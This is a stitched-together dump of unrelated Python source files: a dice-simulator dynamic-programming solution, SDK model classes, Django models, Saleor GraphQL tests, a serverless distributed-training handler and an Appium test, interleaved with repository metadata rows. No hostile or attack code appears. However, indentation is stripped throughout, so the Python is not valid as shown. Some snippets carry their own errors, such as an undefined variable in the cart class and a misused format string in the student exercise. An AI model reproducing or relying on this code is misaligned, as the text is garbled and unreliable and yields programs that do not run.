# Two sequences are considered different if at least one element differs from each other. Since the answer may be too
# large, return it modulo 10^9 + 7.
#
#
#
# Example 1:
#
# Input: n = 2, rollMax = [1,1,2,2,2,3]
# Output: 34
# Explanation: There will be 2 rolls of die, if there are no
# constraints on the die, there are 6 * 6 = 36 possible combinations. In this case, looking at rollMax array,
# the numbers 1 and 2 appear at most once consecutively, therefore sequences (1,1) and (2,2) cannot occur,
# so the final answer is 36-2 = 34.
# Example 2:
#
# Input: n = 2, rollMax = [1,1,1,1,1,1]
# Output: 30
# Example 3:
#
# Input: n = 3, rollMax = [1,1,1,2,2,3]
# Output: 181
#
# Constraints:
#
# 1 <= n <= 5000
# rollMax.length == 6
# 1 <= rollMax[i] <= 15
# 问题:有一个骰子模拟器会每次投掷的时候生成一个 1 到 6 的随机数。
# 不过我们在使用它时有个约束,就是使得投掷骰子时,连续掷出数字i的次数不能超过 rollMax[i](i 从 1 开始编号)。
# 给定rollMax和n,返回用n次投掷得到的不同点数序列的数目;
# 假如两个序列中至少存在一个元素不同,就认为这两个序列是不同的。
# 分析:以n=3为例,扔第一次时,i=1,6种情况.假设dp[i][j]为扔i次时以j结尾时的情况
# i=2, 由于rollMax[0,1,2]为1,则不能出现11,22,33的情况,而对于以1结尾的情况为y1,y为非1的数,共5种情况。 对于以4结尾的,则有x4,共6种。
# 则可以得到dp[2][1,2,3]=5, dp[2][4,5,6]=6, dp[2][7] = sum(dp[2]) = 33
# i=3,对于以1结尾的,则有xy1,x为1-6,y为非1数。考虑到dp[2]有33种分布,而在i=2时,以1结尾的情况dp[2][1]有5种,则dp[3][1]=dp[2]-dp[2][1]
# dp[3][1] = dp[3-1] - dp[3-1][1]
# 以另一个例子, i=5, rollMax[5] = 3,以5结尾的情况有如下几种:
# xxxy5
# xxy55
# xy555
# 这几种情况分别对应 而dp[4]的所有情况包含了上述三种情况,现在只要减去不满足上面的情况即可。dp[5][5] = dp[4] - dp[4][5] +dp[3] - dp[3][5] + ...
# 其中dp[4]包含了xxxx的情况,dp[4] - dp[4][5]即 减去xxx5,也就是xxx55的情况,
from typing import List
class Solution:
def dieSimulator(self, n: int, rollMax: List[int]) -> int:
faces = len(rollMax)
# [n + 1][faces + 1] dimensional dp array
dp = [[0 for i in range(faces + 1)] for j in range(n + 1)]
# initialization
# roll 0 times, the total combination is 1
dp[0][faces] = 1
# roll 1 times, the combinations that end at face j is 1
for j in range(faces):
dp[1][j] = 1
# roll 1 times, the total combination is faces = 6
dp[1][faces] = faces
# then roll dices from 2 times, until n times
for i in range(2, n + 1):
# iterate through each column (face)
for j in range(faces):
# at each [i, j], trying to go up (decrease i) and collect all the sum of previous state
for k in range(1, rollMax[j] + 1):
if i - k < 0:
break
dp[i][j] += dp[i - k][faces] - dp[i - k][j]
# update total sum of this row
dp[i][faces] = sum(dp[i])
return dp[n][faces] % 1000000007
| [
"k87974@163.com"
] | k87974@163.com |
4c9a02b5409c94b1bb4ea0e3c04bac9a3ea27a01 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-gsl/huaweicloudsdkgsl/v3/model/show_real_named_response.py | a878e053144f5e24e1385f5992007dfc2351944c | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,870 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowRealNamedResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'iccid': 'str',
'real_named': 'bool'
}
attribute_map = {
'iccid': 'iccid',
'real_named': 'real_named'
}
def __init__(self, iccid=None, real_named=None):
"""ShowRealNamedResponse - a model defined in huaweicloud sdk"""
super(ShowRealNamedResponse, self).__init__()
self._iccid = None
self._real_named = None
self.discriminator = None
if iccid is not None:
self.iccid = iccid
if real_named is not None:
self.real_named = real_named
@property
def iccid(self):
"""Gets the iccid of this ShowRealNamedResponse.
ICCID
:return: The iccid of this ShowRealNamedResponse.
:rtype: str
"""
return self._iccid
@iccid.setter
def iccid(self, iccid):
"""Sets the iccid of this ShowRealNamedResponse.
ICCID
:param iccid: The iccid of this ShowRealNamedResponse.
:type: str
"""
self._iccid = iccid
@property
def real_named(self):
"""Gets the real_named of this ShowRealNamedResponse.
是否已实名认证: true表示是,false表示否。
:return: The real_named of this ShowRealNamedResponse.
:rtype: bool
"""
return self._real_named
@real_named.setter
def real_named(self, real_named):
"""Sets the real_named of this ShowRealNamedResponse.
是否已实名认证: true表示是,false表示否。
:param real_named: The real_named of this ShowRealNamedResponse.
:type: bool
"""
self._real_named = real_named
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowRealNamedResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
e0fd8a8d176a8e39489490cca6af92f2274b1118 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_285/ch34_2019_06_03_00_25_27_762087.py | f2819fd0219c42be675bd7d5afd0366d356bc55b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | deposito= float(input("depósito inicial: "))
taxa= float(input("taxa de juros: "))
total=0
mes=1
contador=0
while contador<=24:
mes+=deposito*(1+taxa)
deposito=mes
print(mes, '.2f')
contador+=1
total+=deposito*taxa
print(total, '.2f') | [
"you@example.com"
] | you@example.com |
7216333c302abb5b4fec775da03c1c66a1cae875 | e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d | /a10sdk/core/rate/rate_limit.py | 929ad6636bdb4d3038f3d89fee75dae645facb41 | [
"Apache-2.0"
] | permissive | amwelch/a10sdk-python | 4179565afdc76cdec3601c2715a79479b3225aef | 3e6d88c65bd1a2bf63917d14be58d782e06814e6 | refs/heads/master | 2021-01-20T23:17:07.270210 | 2015-08-13T17:53:23 | 2015-08-13T17:53:23 | 40,673,499 | 0 | 0 | null | 2015-08-13T17:51:35 | 2015-08-13T17:51:34 | null | UTF-8 | Python | false | false | 1,402 | py | from a10sdk.common.A10BaseClass import A10BaseClass
class RateLimit(A10BaseClass):
""" :param maxPktNum: {"description": "Max number of packets", "format": "number", "default": 10000, "optional": true, "maximum": 100000, "minimum": 1000, "type": "number"}
:param rl_type: {"optional": true, "enum": ["ctrl"], "type": "string", "description": "'ctrl': The max number of packets that can be sent to kernel in 100ms; ", "format": "enum"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
Rate limit configuration.
Class rate-limit supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/rate-limit`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "rate-limit"
self.a10_url="/axapi/v3/rate-limit"
self.DeviceProxy = ""
self.maxPktNum = ""
self.rl_type = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
| [
"doug@parksidesoftware.com"
] | doug@parksidesoftware.com |
824b24517c09d539722766485dba21e97ce02513 | c2a03f1cdc338c9078534d8eb2213b214a251e73 | /Pollapp/models.py | 1f700be8d88cd216b815efd7141c4ea87d9d0ca1 | [] | no_license | risification/onlinde_test | 9a2db6a945734cc74ee8bc8408ac0ce39fa9d3b3 | 3e1e7e5aca4fa59db08f6394c85ce00652c0871b | refs/heads/master | 2023-03-14T08:24:53.574738 | 2021-03-05T17:22:08 | 2021-03-05T17:22:08 | 344,850,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | from django.db import models
from datetime import date
# Create your models here.
class Poll(models.Model):
name = models.CharField(max_length=30)
date = models.DateField(auto_now_add=True)
points = models.IntegerField(default=0)
class Question(models.Model):
poll = models.ForeignKey(Poll, on_delete=models.CASCADE)
title = models.CharField(max_length=50)
true_answer = models.CharField(max_length=30)
class ChoiceAnsw(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice = models.CharField(max_length=40)
class Answer(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
answer = models.CharField(max_length=30)
| [
"sultangaziev01@bk.ru"
] | sultangaziev01@bk.ru |
df168a8023119311931f1cfac20f2fad47c90e2e | 19fa45bfc16ba8c4856c0c4de8a9491714e77c3c | /PythonLearningDemo/python_repos.py | a9c7a3f44e41344106bc87e5940b77fd2afdb8fc | [] | no_license | JoyUCUU/QA | 046971d84d13b75155b91201267f7374e93d30cf | acff032c481be1483e05cf478bb6f07039c4048f | refs/heads/master | 2021-01-18T12:54:46.219302 | 2018-07-23T12:10:59 | 2018-07-23T12:10:59 | 84,333,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | import requests
import requests
import pygal
from pygal.style import LightColorizedStyle as LCS,LightenStyle as LS
#执行API调用并存储相应
url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'
r = requests.get(url)
print("Status Code: " ,r.status_code)
#将API的响应存储到一个变量中
response_dict = r.json()
print("Total repositories:",response_dict['total_count'])
#探索有关仓库的信息
repo_dicts = response_dict['items']
print("Repositories returned:",len(repo_dicts))
names,plot_dicts = [],[]
for repo_dict in repo_dicts:
names.append(repo_dict['name'])
plot_dict = dict(value=repo_dict['stargazers_count'], xlink=repo_dict['html_url'], label=repo_dict['description'])
plot_dicts.append(plot_dict)
# names,stars = [],[]
# for repo_dict in repo_dicts:
# names.append(repo_dict['name'])
# stars.append(repo_dict['stargazers_count'])
#可视化
my_style = LS('#333366',base_style=LCS)
chart = pygal.Bar(style = my_style,x_label_rotation = 45,show_legend = False)
chart.title = "Most-starred Python Project on GitHub"
chart.x_labels = names
chart.add('',plot_dicts)
chart.render_to_file('python_repos1.svg')
#研究第一个仓库
#repo_dict = repo_dicts[0]
# for repo_dict in repo_dicts:
# print('\nName:',repo_dict['name'])
# print('Owner:',repo_dict['owner']['login'])
# print('Stars:',repo_dict['stargazers_count'])
# print('Repository',repo_dict['html_url'])
# print('Description',repo_dict['description'])
| [
"your_email@youremail.com"
] | your_email@youremail.com |
b0162723ed29495537ea9a9eec04cca7e4c319e7 | 3a533d1503f9a1c767ecd3a29885add49fff4f18 | /saleor/graphql/tax/tests/queries/test_tax_configuration.py | 73297b2699c9d21b07e645750f303df73f7fd48c | [
"BSD-3-Clause"
] | permissive | jonserna/saleor | 0c1e4297e10e0a0ce530b5296f6b4488f524c145 | b7d1b320e096d99567d3fa7bc4780862809d19ac | refs/heads/master | 2023-06-25T17:25:17.459739 | 2023-06-19T14:05:41 | 2023-06-19T14:05:41 | 186,167,599 | 0 | 0 | BSD-3-Clause | 2019-12-29T15:46:40 | 2019-05-11T18:21:31 | TypeScript | UTF-8 | Python | false | false | 3,467 | py | import graphene
from saleor.tax.models import TaxConfiguration
from ....tests.utils import assert_no_permission, get_graphql_content
from ..fragments import TAX_CONFIGURATION_FRAGMENT
QUERY = (
"""
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
...TaxConfiguration
}
}
"""
+ TAX_CONFIGURATION_FRAGMENT
)
def _test_field_resolvers(tax_configuration: TaxConfiguration, data: dict):
country_exceptions = tax_configuration.country_exceptions.all()
country_exception = country_exceptions[0]
assert data["id"] == graphene.Node.to_global_id(
"TaxConfiguration", tax_configuration.pk
)
assert data["chargeTaxes"] == tax_configuration.charge_taxes
assert data["displayGrossPrices"] == tax_configuration.display_gross_prices
assert data["pricesEnteredWithTax"] == tax_configuration.prices_entered_with_tax
assert len(data["countries"]) == len(country_exceptions)
assert data["countries"][0]["country"]["code"] == country_exception.country.code
assert data["countries"][0]["chargeTaxes"] == country_exception.charge_taxes
assert (
data["countries"][0]["displayGrossPrices"]
== country_exception.display_gross_prices
)
def test_tax_configuration_query_no_permissions(channel_USD, user_api_client):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = user_api_client.post_graphql(QUERY, variables, permissions=[])
# then
assert_no_permission(response)
def test_tax_configuration_query_staff_user(channel_USD, staff_api_client):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = staff_api_client.post_graphql(QUERY, variables)
# then
content = get_graphql_content(response)
_test_field_resolvers(
channel_USD.tax_configuration, content["data"]["taxConfiguration"]
)
def test_tax_configuration_query_app(channel_USD, app_api_client):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = app_api_client.post_graphql(QUERY, variables)
# then
content = get_graphql_content(response)
_test_field_resolvers(
channel_USD.tax_configuration, content["data"]["taxConfiguration"]
)
TAX_CONFIGURATION_PRIVATE_METADATA_QUERY = """
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
id
privateMetadata {
key
value
}
}
}
"""
def test_tax_class_private_metadata_requires_manage_taxes_app(
app_api_client, channel_USD, permission_manage_taxes
):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = app_api_client.post_graphql(
TAX_CONFIGURATION_PRIVATE_METADATA_QUERY,
variables,
permissions=[permission_manage_taxes],
)
# then
content = get_graphql_content(response)
data = content["data"]["taxConfiguration"]
assert data["id"] == graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
assert data["privateMetadata"]
| [
"noreply@github.com"
] | jonserna.noreply@github.com |
923fbbb3366566898a71cf15294ef39fc1dc4139 | 6d0f6cc613c6f1a61b787c8cc1ef9a20895be40c | /django-cielo-exemplo/apps/carrinho/cart.py | 2568e3f07c18169eeefc6fa2e5797e2ed6b0e6dc | [
"Apache-2.0"
] | permissive | vitorh45/django-ecommerce-exemplo1 | 7f3f4887a118439b8de305044392e9baa381cf23 | c033ff2eca70230f676f8bd95d0bd5ecd89948a4 | refs/heads/master | 2016-09-15T18:42:38.600694 | 2013-09-08T05:23:26 | 2013-09-08T05:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,958 | py | # -*- coding: utf-8 -*-
import datetime
import models
from django.utils.formats import number_format
from apps.cart import Cart as Cart_
from apps.cart.models import Cart, Item
class CustomCart(Cart_):
def add(self, product, size, quantity=1):
try:
item = models.Item.objects.get(
cart=self.cart,
product=product,
size=size,
)
item.quantity += quantity
item.save()
except models.Item.DoesNotExist:
item = models.Item()
item.cart = self.cart
item.product = product
item.quantity = quantity
item.size = size
if product.em_promocao:
item.unity_price = product.preco_promocao
else:
item.unity_price = produto.preco
item.save()
def verificar_quantidade(self,produto,tamanho):
try:
item = models.Item.objects.get(carrinho=self.carrinho,produto=produto,tamanho=tamanho)
return item.quantidade
except:
return 0
def preco_total(self):
total = 0
for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
total += item.preco_total
return total
def preco_total_formatado(self):
total = 0
for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
total += item.preco_total
return number_format(total,2)
def peso_total(self):
total = 0
for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
total += item.product.peso * item.quantity
return total
def quantidade(self):
quantidade = len(self.cart.item_set.all())
| [
"vitorh45@gmail.com"
] | vitorh45@gmail.com |
53503ee1218375df372c3de772acf5ad34434c8e | 372f1aa2cf1d7091d3c8116dfeb9284d9630cfa0 | /examples/lambda/s3/dl_s3_trial.py | ac1e6e176843b3dbfd27a1dfb07878af5c8aa996 | [
"Apache-2.0"
] | permissive | NLGithubWP/LambdaML | 8dbb3c4355aa899708cdefa5415659d0a950868e | 0afca7819e08632ba116fec8e102084e4040a47a | refs/heads/master | 2023-09-04T11:32:40.141624 | 2021-10-25T11:38:10 | 2021-10-25T11:38:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,095 | py | import os
import time
import math
import numpy as np
import pickle
import json
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import boto3
from utils.constants import Prefix, MLModel, Optimization, Synchronization
from storage import S3Storage
from communicator import S3Communicator
from storage import DynamoTable
from storage.dynamo import dynamo_operator
from model import deep_models
from utils.metric import Accuracy, Average
def handler(event, context):
start_time = time.time()
# dataset setting
train_file = event['train_file']
test_file = event['test_file']
data_bucket = event['data_bucket']
n_features = event['n_features']
n_classes = event['n_classes']
n_workers = event['n_workers']
worker_index = event['worker_index']
tmp_bucket = event['tmp_bucket']
merged_bucket = event['merged_bucket']
cp_bucket = event['cp_bucket']
# training setting
model_name = event['model']
optim = event['optim']
sync_mode = event['sync_mode']
assert model_name.lower() in MLModel.Deep_Models
assert optim.lower() in Optimization.All
assert sync_mode.lower() in Synchronization.All
# hyper-parameter
learning_rate = event['lr']
batch_size = event['batch_size']
n_epochs = event['n_epochs']
start_epoch = event['start_epoch']
run_epochs = event['run_epochs']
function_name = event['function_name']
print('data bucket = {}'.format(data_bucket))
print("train file = {}".format(train_file))
print("test file = {}".format(test_file))
print('number of workers = {}'.format(n_workers))
print('worker index = {}'.format(worker_index))
print('model = {}'.format(model_name))
print('optimization = {}'.format(optim))
print('sync mode = {}'.format(sync_mode))
print('start epoch = {}'.format(start_epoch))
print('run epochs = {}'.format(run_epochs))
print("Run function {}, round: {}/{}, epoch: {}/{} to {}/{}"
.format(function_name, int(start_epoch/run_epochs) + 1, math.ceil(n_epochs / run_epochs),
start_epoch + 1, n_epochs, start_epoch + run_epochs, n_epochs))
storage = S3Storage()
communicator = S3Communicator(storage, tmp_bucket, merged_bucket, n_workers, worker_index)
# download file from s3
local_dir = "/tmp"
read_start = time.time()
storage.download(data_bucket, train_file, os.path.join(local_dir, train_file))
storage.download(data_bucket, test_file, os.path.join(local_dir, test_file))
print("download file from s3 cost {} s".format(time.time() - read_start))
train_set = torch.load(os.path.join(local_dir, train_file))
test_set = torch.load(os.path.join(local_dir, test_file))
train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=100, shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
print("read data cost {} s".format(time.time() - read_start))
random_seed = 100
torch.manual_seed(random_seed)
device = 'cpu'
net = deep_models.get_models(model_name).to(device)
# Loss and Optimizer
# Softmax is internally computed.
# Set parameters to be updated.
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate)
# load checkpoint model if it is not the first round
if start_epoch != 0:
checked_file = 'checkpoint_{}.pt'.format(start_epoch - 1)
storage.download(cp_bucket, checked_file, os.path.join(local_dir, checked_file))
checkpoint_model = torch.load(os.path.join(local_dir, checked_file))
net.load_state_dict(checkpoint_model['model_state_dict'])
optimizer.load_state_dict(checkpoint_model['optimizer_state_dict'])
print("load checkpoint model at epoch {}".format(start_epoch - 1))
for epoch in range(start_epoch, min(start_epoch + run_epochs, n_epochs)):
train_loss, train_acc = train_one_epoch(epoch, net, train_loader, optimizer, worker_index,
communicator, optim, sync_mode)
test_loss, test_acc = test(epoch, net, test_loader)
print('Epoch: {}/{},'.format(epoch + 1, n_epochs),
'train loss: {}'.format(train_loss),
'train acc: {},'.format(train_acc),
'test loss: {}'.format(test_loss),
'test acc: {}.'.format(test_acc), )
if worker_index == 0:
storage.clear(tmp_bucket)
storage.clear(merged_bucket)
# training is not finished yet, invoke next round
if epoch < n_epochs - 1:
checkpoint_model = {
'epoch': epoch,
'model_state_dict': net.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': train_loss.average
}
checked_file = 'checkpoint_{}.pt'.format(epoch)
if worker_index == 0:
torch.save(checkpoint_model, os.path.join(local_dir, checked_file))
storage.upload_file(cp_bucket, checked_file, os.path.join(local_dir, checked_file))
print("checkpoint model at epoch {} saved!".format(epoch))
print("Invoking the next round of functions. round: {}/{}, start epoch: {}, run epoch: {}"
.format(int((epoch + 1) / run_epochs) + 1, math.ceil(n_epochs / run_epochs),
epoch + 1, run_epochs))
lambda_client = boto3.client('lambda')
payload = {
'train_file': event['train_file'],
'test_file': event['test_file'],
'data_bucket': event['data_bucket'],
'n_features': event['n_features'],
'n_classes': event['n_classes'],
'n_workers': event['n_workers'],
'worker_index': event['worker_index'],
'tmp_bucket': event['tmp_bucket'],
'merged_bucket': event['merged_bucket'],
'cp_bucket': event['cp_bucket'],
'model': event['model'],
'optim': event['optim'],
'sync_mode': event['sync_mode'],
'lr': event['lr'],
'batch_size': event['batch_size'],
'n_epochs': event['n_epochs'],
'start_epoch': epoch + 1,
'run_epochs': event['run_epochs'],
'function_name': event['function_name']
}
lambda_client.invoke(FunctionName=function_name,
InvocationType='Event',
Payload=json.dumps(payload))
elif worker_index == 0:
# write record to dynamodb table
recorder_table_name = "recoder"
dynamo_client = dynamo_operator.get_client()
recorder_tb = DynamoTable(dynamo_client, recorder_table_name)
recorder_tb.save("{},{}".format(test_loss, test_acc), learning_rate, "learning_rate")
end_time = time.time()
print("Elapsed time = {} s".format(end_time - start_time))
# Train
def train_one_epoch(epoch, net, train_loader, optimizer, worker_index,
communicator, optim, sync_mode):
assert isinstance(communicator, S3Communicator)
net.train()
epoch_start = time.time()
epoch_cal_time = 0
epoch_comm_time = 0
train_acc = Accuracy()
train_loss = Average()
for batch_idx, (inputs, targets) in enumerate(train_loader):
batch_start = time.time()
outputs = net(inputs)
loss = F.cross_entropy(outputs, targets)
optimizer.zero_grad()
loss.backward()
batch_cal_time = time.time() - batch_start
batch_comm_time = 0
if optim == "grad_avg":
if sync_mode == "reduce" or sync_mode == "reduce_scatter":
grads = [param.grad.data.numpy() for param in net.parameters()]
batch_cal_time = time.time() - batch_start
epoch_cal_time += batch_cal_time
batch_comm_start = time.time()
postfix = "{}_{}".format(epoch, batch_idx)
if sync_mode == "reduce":
merged_grads = communicator.reduce_batch_nn(pickle.dumps(grads), postfix)
elif sync_mode == "reduce_scatter":
merged_grads = communicator.reduce_batch_nn(pickle.dumps(grads), postfix)
for layer_index, param in enumerate(net.parameters()):
param.grad.data = torch.from_numpy(merged_grads[layer_index])
batch_comm_time = time.time() - batch_comm_start
print("one {} round cost {} s".format(sync_mode, batch_comm_time))
epoch_comm_time += batch_comm_time
elif sync_mode == "async":
# async does step before sync
optimizer.step()
batch_cal_time = time.time() - batch_start
epoch_cal_time += batch_cal_time
batch_comm_start = time.time()
weights = [param.data.numpy() for param in net.parameters()]
new_weights = communicator.async_reduce_nn(pickle.dumps(weights), Prefix.w_b_prefix)
for layer_index, param in enumerate(net.parameters()):
param.data = torch.from_numpy(new_weights[layer_index])
batch_comm_time = time.time() - batch_comm_start
print("one {} round cost {} s".format(sync_mode, batch_comm_time))
epoch_comm_time += batch_comm_time
# async does step before sync
if sync_mode != "async":
step_start = time.time()
optimizer.step()
batch_cal_time += time.time() - step_start
epoch_cal_time += batch_cal_time
train_acc.update(outputs, targets)
train_loss.update(loss.item(), inputs.size(0))
if batch_idx % 10 == 0:
print("Epoch: [{}], Batch: [{}], train loss: {}, train acc: {}, batch cost {} s, "
"cal cost {} s, comm cost {} s"
.format(epoch + 1, batch_idx + 1, train_loss, train_acc, time.time() - batch_start,
batch_cal_time, batch_comm_time))
if optim == "model_avg":
weights = [param.data.numpy() for param in net.parameters()]
epoch_cal_time += time.time() - epoch_start
epoch_sync_start = time.time()
postfix = str(epoch)
if sync_mode == "reduce":
merged_weights = communicator.reduce_epoch_nn(pickle.dumps(weights), postfix)
elif sync_mode == "reduce_scatter":
merged_weights = communicator.reduce_epoch_nn(pickle.dumps(weights), postfix)
elif sync_mode == "async":
merged_weights = communicator.async_reduce_nn(pickle.dumps(weights), Prefix.w_b_prefix)
for layer_index, param in enumerate(net.parameters()):
param.data = torch.from_numpy(merged_weights[layer_index])
print("one {} round cost {} s".format(sync_mode, time.time() - epoch_sync_start))
epoch_comm_time += time.time() - epoch_sync_start
if worker_index == 0:
delete_start = time.time()
# model avg delete by epoch
if optim == "model_avg" and sync_mode != "async":
communicator.delete_expired_epoch(epoch)
elif optim == "grad_avg" and sync_mode != "async":
communicator.delete_expired_batch(epoch, batch_idx)
epoch_comm_time += time.time() - delete_start
print("Epoch {} has {} batches, cost {} s, cal time = {} s, comm time = {} s"
.format(epoch + 1, batch_idx, time.time() - epoch_start, epoch_cal_time, epoch_comm_time))
return train_loss, train_acc
def test(epoch, net, test_loader):
# global best_acc
net.eval()
test_loss = Average()
test_acc = Accuracy()
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(test_loader):
outputs = net(inputs)
loss = F.cross_entropy(outputs, targets)
test_loss.update(loss.item(), inputs.size(0))
test_acc.update(outputs, targets)
return test_loss, test_acc
| [
"blue.jwjiang@gmail.com"
] | blue.jwjiang@gmail.com |
1babc7072766b27347596ff016edc48801b231a5 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/timber/testcase/firstcases/testcase2_014.py | be622f71f51754baf60fa67975a8405d081d50d6 | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'com.naman14.timber',
'appActivity' : 'com.naman14.timber.activities.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'com.naman14.timber/com.naman14.timber.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase014
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
driver.press_keycode(4)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"2_014\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'com.naman14.timber'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
